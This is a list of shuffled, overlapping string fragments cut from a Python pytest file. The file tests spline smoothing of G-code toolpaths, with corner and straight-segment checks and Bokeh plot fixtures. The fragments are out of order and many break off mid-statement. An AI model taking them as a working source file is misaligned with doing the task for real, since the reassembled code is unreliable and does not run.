"check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self):",
"start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data,",
"elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start",
"self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start",
"X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1,",
"abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100",
"of the spline segment is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start),",
"points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return",
"+ np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20",
"self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the spline segment is not",
"lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea -",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0,",
"middle point of the spline segment is not on the line\" assert point_on_line(self.start_point,",
"line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist",
"= [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return",
"the line segment end\" corner_error = \"The closest point of the corner is",
"segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0,",
"not on the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end))",
"start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data,",
"l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50,",
"os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret) def",
"\\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start",
"\"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t =",
"== \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0,",
"self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end))",
"data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100",
"< 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]),",
"self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0)",
"s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\")",
"check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert",
"1.0) end_error_segment = \"The end point of the spline segment is not on",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\"",
"corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"@pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True)",
"at the end of the spline segment\" if self.s > 0: prev_end =",
"plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250,",
"checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if",
"l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s]",
"close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0)",
"self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point of the spline segment",
"check_continuity(self): msg = \"There's a discontinuity at the end of the spline segment\"",
"l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this",
"self.spline_start, \\ \"The previous segment does not end where the current one starts\"",
"self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point",
"start type\" if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short()",
"the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) ==",
"self.spline_end > self.spline_mid, \\ \"The endpoint of the corner spline is before the",
"and the current segment start do not match up\" def check_corner_spline_order(self): assert self.spline_end",
"@pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250,",
"abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\",
"straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"of the spline segment is not on the middle of the line\" def",
"assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the spline",
"assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point,",
"== \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end ==",
"<=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0,",
"assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of",
"on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12),",
"s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\")",
"plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None,",
"data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data,",
"Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0,",
"Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\",",
"up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of the corner",
"\"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\"",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end, False)",
"end point of the spline segment does not match the line end point\"",
"= data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start +",
"point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point,",
"s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 +",
"< 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]),",
"points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea",
"s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert",
"5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note",
"\"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\",
"Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line(",
"\\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([",
"== \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([",
"== \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data =",
"self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's",
"np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"= data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s]",
"== pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline segment",
"start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end ==",
"check_line_start_point_middle(self): msg = \"The start point of the spline segment is not on",
"err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of the spline",
"\"The middle point of the spline segment is not on the middle of",
"segment is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid))",
"maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data:",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\")",
"checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if",
"= plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment(",
"line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg =",
"<= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01,",
"not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of",
"Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\",",
"100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def",
"self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start =",
"== \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end()",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data)",
"straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) +",
"pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point",
"abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200",
"= data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([",
"end): checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start ==",
"\"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start == \"middle\":",
"points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1],",
"start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert",
"prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment does not",
"closest point of the corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point",
"check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self):",
"checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0,",
"1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def",
"data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"\\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([",
"Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0,",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2,",
"def check_point_on_middle_of_line(self): msg = \"The middle point of the spline segment is not",
"self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point of the spline segment",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ],",
"else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(),",
"100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1",
"data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data",
"l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1]",
"self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline",
"np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) *",
"checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity()",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data",
"on the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) ==",
"False, \"Invalid start type\" if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line()",
"SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l,",
"Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data,",
"def corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end,",
"line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea,",
"abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0",
"==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end):",
"start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert",
"data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l +",
"line_dist = self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length",
"end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1])",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that",
"assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point",
"+ self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert",
"== \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle()",
"point of the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point,",
"1.0: line_dist = self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist +",
"return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner):",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200,",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter):",
"plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ],",
"np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\",",
"def straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end,",
"the spline segment is not on the middle of the line\" assert point_on_middle_of_line(self.start_point,",
"SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle",
"as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__))",
"assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert",
"self.s = s self.start = start self.end = end self.start_point = data.start_xy[l] self.end_point",
"start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data,",
"if start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False,",
"plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ],",
"line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\",
"middle point of the spline segment is not on the middle of the",
"l, s, start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start",
"s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\")",
"line <= 1.0: line_dist = self.start_line_dist + self.line_length * line else: line_dist =",
"vibration_compensation import read_gcode, Data import pytest from numpy.testing import * import numpy as",
"100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)",
"self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and the",
"pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1",
"+ np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100",
"msg = \"The start point of the spline segment does not match the",
"X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"\"The start point of the spline segment is not on the end of",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 +",
"the corner spline is before the line segment end\" corner_error = \"The closest",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data,",
"False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker =",
"X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"\"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"/ 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length =",
"corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\",
"elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False,",
"self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point of the spline segment",
"point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end",
"def check_line_start_point_middle(self): msg = \"The start point of the spline segment is not",
"Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data,",
"def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) * 0.5 + linea",
"generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert",
"end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"the end of the spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1]",
"\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker = SegmentChecker(data,",
"end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" )",
"point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the",
"= data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end",
